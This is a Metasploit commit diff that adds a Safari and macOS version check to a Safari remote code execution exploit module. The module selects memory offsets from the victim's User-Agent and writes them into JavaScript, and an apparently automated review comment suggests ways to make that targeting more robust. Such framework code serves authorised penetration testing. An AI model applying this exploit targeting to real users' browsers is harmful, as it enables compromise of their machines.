Land #11347, add version check to Safari RCE exploit

4.x
Brent Cook 2019-02-04 05:22:01 -06:00 committed by Metasploit
parent b016447ea6
commit 99cc417a5c
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 12 additions and 4 deletions


@ -98,14 +98,22 @@ class MetasploitModule < Msf::Exploit::Remote
def get_offsets(user_agent)
if user_agent =~ /Intel Mac OS X (.*?)\)/
version = $1.gsub("_", ".")
mac_osx_version = Gem::Version.new(version)
osx_version = $1.gsub("_", ".")
if user_agent =~ /Version\/(.*?) /
if Gem::Version.new($1) >= Gem::Version.new('11.1.1')
print_warning "Safari version #{$1} is not vulnerable"
return false
else
print_good "Safari version #{$1} appears to be vulnerable"
end
end
mac_osx_version = Gem::Version.new(osx_version)
if mac_osx_version >= Gem::Version.new('10.13.4')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif mac_osx_version < Gem::Version.new('10.12')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif offset_table.key?(version)
offset = offset_table[version]
elsif offset_table.key?(osx_version)
offset = offset_table[osx_version]
return <<-EOF
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
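Review bot: The new Safari check passes the `Version/` capture straight to `Gem::Version.new($1)`, which raises ArgumentError on a malformed version string, and the User-Agent is client-controlled; the existing `Gem::Version.new(osx_version)` call has the same exposure. Storing the capture in a local and guarding it, e.g. `safari_version = $1` followed by `return false unless Gem::Version.correct?(safari_version)`, would turn a bad header into a clean refusal instead of an exception in the request handler. The Safari branch also does `return false`, while the two macOS "not vulnerable" branches only print a warning and fall through. The end of get_offsets is outside this hunk, so I can't confirm those paths return the same falsy value; making them uniform would keep callers from having to tell `false` and `nil` apart. A short comment stating that a User-Agent without a `Version/` token skips the Safari gate entirely would make that behaviour visibly intentional.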